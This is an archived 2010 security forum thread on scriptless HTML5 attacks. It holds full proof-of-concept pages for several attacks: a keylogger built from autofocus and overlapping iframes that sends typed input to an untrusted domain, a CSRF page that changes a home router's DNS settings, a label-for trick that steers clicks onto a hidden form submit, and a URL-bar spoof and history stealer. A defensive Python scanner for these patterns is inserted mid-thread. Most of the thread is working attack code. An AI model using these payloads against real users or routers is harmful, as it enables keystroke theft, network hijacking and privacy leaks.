Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
HTML 5 Scripting
Posted by: Skyphire
Date: April 28, 2010 12:15PM

HTML 5 Scripting - Without JavaScript.


Scriptless keylog primer PoC.

It still requires an ENTER/SPACE key event, but we might be able to bubble focus
through the FOR attribute to get even more flow control. Granted, this was
possible with JavaScript enabled before, but never without JavaScript, since
there was no way to get focus from flow control from another domain, until now.
This is only an example of what autofocus can be capable of. I am sure more
elegant attacks are possible, given the time to think them up.


!!Legitform.html (on trusted domain)
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Scriptless keylog primer</title>
</head>
<body>
<form name="logo" method="post" action="http://www.google.com">
<input type="text" name="log">
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>

!!Keylog.html (on untrusted domain)
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Scriptless keylog primer</title>
</head>
<body>
<form name="logo" method="GET" action="http://www.scriptkiddie.universe.com">
<input type="text" name="log" autofocus> <!-- Due to autofocus, Frame F2 gets the focus. Even when it's below Frame F1! -->
<input type="submit" name="submit" value="submit">
</form>
</body>
</html>

!!Test.html (on trusted domain, possibly injected/stored reflected XSS or
simply from unsanitized code)
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Scriptless keylog primer</title>
</head>
<body>

<!-- This is only to watch what exactly happens, irl we set Frame F2 with a
fixed top position of about 19px/20px to let Frame F1 overlap Frame F2 -->
<iframe name="F1" src="legitform.html" style="position:absolute; top:18px;
left:90px; z-index:3; height:25px; background-color:cyan;" scrolling="no">
</iframe>

<iframe name="F2" src="keylog.html" style="position:absolute; top:50px; left:90px;
z-index:2; height:25px; background-color:magenta;" scrolling="no">
</iframe>

</body>
</html>

-Skyphire.


Another PoC utilizes autofocus to bubble focus to the submit button on another
page, thereby performing a CSRF to change a home router's DNS settings, as an
example; it can be anything else malicious.

!! Test.html (on trusted server)
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>CSRF example</title>
</head>
<body>

<!-- CSRF example injected portion through XSS/Unsanitized database -->

<iframe name="csrf" src="csrf.html"></iframe>

</body>
</html>

!! CSRF.html (on untrusted server)
<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Change router DNS settings</title>
</head>
<body>
<form name="logo" method="POST" action="http://192.168.1.2/">
<input type="text" name="log">
<input type="hidden" name="DNS" value="255.255.255.255">
<input type="submit" name="submit" value="submit" autofocus><!-- setting
autofocus on SUBMIT; Bad idea... -->
</form>
</body>
</html>

-Skyphire

Lest we forget:


<!-- bubble all flow control towards the button (including body clicks!) -->

<label for="submit">

  <body>

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque faucibus 
condimentum dui, nec suscipit nibh pulvinar quis. Mauris feugiat vulputate neque
 sed malesuada. Nam nec nibh id neque tristique fermentum. Maecenas dignissim mi
 nec libero ullamcorper sed imperdiet nisi vestibulum. Morbi iaculis risus id 
nulla pulvinar pharetra. Aenean a diam magna. Donec facilisis justo a velit 
malesuada dapibus. In sodales nisl a libero congue quis porttitor est malesuada.
 Duis pharetra, eros a eleifend porttitor, est risus aliquet justo, vitae auctor 
neque arcu et lacus. Etiam ornare magna sed nibh sagittis ut elementum lorem 
ultrices. Ut viverra interdum dictum. Vestibulum quis lorem et risus volutpat 
consequat eget a purus. Donec pharetra dictum suscipit. Cum sociis natoque 
penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam eget 
lectus mi, nec commodo nulla. Curabitur sed egestas quam. Phasellus dignissim 
purus ut sem fringilla ut ultrices magna auctor. Nam eu augue nibh. Morbi non 
augue nibh. 

   <form action="http://192.168.1.2/yourvulnrouter.html" method="post"><input type="submit" id="submit" style="display:none;"></form>

  </body>

</label>


So what else can we do? Stealing files through FILE?
NO JS allowed, since that's BORING! (; - BTW, we really need a browser forum at sla.ckers, right, right? *puppy eyes*



Edited 1 time(s). Last edit at 04/28/2010 01:30PM by Skyphire.
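As an added defender-side example (not code from this thread), a small Python check built on the standard library's html.parser that flags the scriptless focus-hijack patterns shown above in user-supplied HTML before it is stored or embedded in a trusted page: autofocus controls, hidden submit buttons, overlapping absolutely positioned iframes, and a label-for wrapping a large block of content. The sample fragment and the router.example.invalid host are constructed placeholders.

```python
from html.parser import HTMLParser

class FocusHijackScanner(HTMLParser):
    """Flag scriptless focus-hijack indicators in HTML that a trusted page will embed."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._labels = []        # stack: does each open <label> carry a for= attribute?
        self._label_chars = 0    # visible text seen inside the outermost open <label for>

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        style = a.get("style", "").replace(" ", "").lower()
        itype = a.get("type", "text").lower()
        if tag == "input" and "autofocus" in a:
            if itype == "submit":
                self.findings.append("autofocus on submit: one stray Enter/Space submits the form")
            else:
                self.findings.append(f"autofocus on {itype} input: steals focus from the host page")
        if tag == "input" and itype == "submit" and "display:none" in style:
            self.findings.append("hidden submit button: typical target of label-for click redirection")
        if tag == "iframe" and "position:absolute" in style and "z-index" in style:
            self.findings.append("absolutely positioned iframe with z-index: frame overlap / UI redress")
        if tag == "label":
            self._labels.append("for" in a)

    def handle_data(self, data):
        if any(self._labels):
            self._label_chars += len(data.strip())

    def handle_endtag(self, tag):
        if tag == "label" and self._labels:
            had_for = self._labels.pop()
            if had_for and not any(self._labels):
                if self._label_chars > 200:
                    self.findings.append("<label for> wrapping a large block: body clicks land on the control")
                self._label_chars = 0

def scan(html):
    """Return the findings for one HTML fragment (empty list: nothing flagged)."""
    scanner = FocusHijackScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings

# Constructed sample mirroring the thread's label-for trick; the host is a placeholder, not a real target.
SAMPLE_LABEL_WRAP = ('<label for="go">' + "Lorem ipsum dolor sit amet. " * 20 +
                     '<form action="http://router.example.invalid/" method="post">'
                     '<input type="submit" id="go" style="display:none;"></form></label>')
```

Running `scan(SAMPLE_LABEL_WRAP)` reports both the hidden submit button and the oversized label; a normal short `<label for>` next to a visible control produces no findings.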

Re: HTML 5 Scripting
Posted by: Gareth Heyes
Date: April 28, 2010 12:42PM

Yeah browser forum would be good

also a sandbox forum!

*puppy eyes* also

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: HTML 5 Scripting
Posted by: Skyphire
Date: May 09, 2010 11:13PM

Got another one for Opera, but it requires JS for now. Maybe it's possible to steal all history, not sure. Didn't find a quick solution for it yet. IRL we would listen for DOMFocusOut, for example, to trigger the fake URL bar.


<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>URLbar Spoof c.q. History stealer primer.</title>

<script>
  // Poll the autofocused url field; once it holds a value containing a dot
  // (i.e. one of the browser's history suggestions was picked), navigate there.
  setInterval(bubble, 3);

  function bubble(v) {
    if (!v) { v = document.getElementById('url').value; }
    if (v.indexOf(".") != -1) {
      alert('Okay, so you went to ' + v + ' before? \r\n Let\'s go there again shall we.');
      document.location.href = v;
    }
  }
</script>

<style>
	
#url {
	width:200px;
	height:1px;
	position:absolute;
	top: -32px;
	left: 220px;
	font-size:99px;
	z-index:0;
	border:10px solid #fff;
}

</style>

</head>
<body>
    <h1>Type a letter right now. W, or S, or anything that resembles your history.</h1>
    then you will see a list, click one of your favourites!
    <form>
    <input name="url" type="url" id="url" value="" autofocus>
    </form>
</body>
</html>



Edited 1 time(s). Last edit at 05/13/2010 03:37AM by Skyphire.


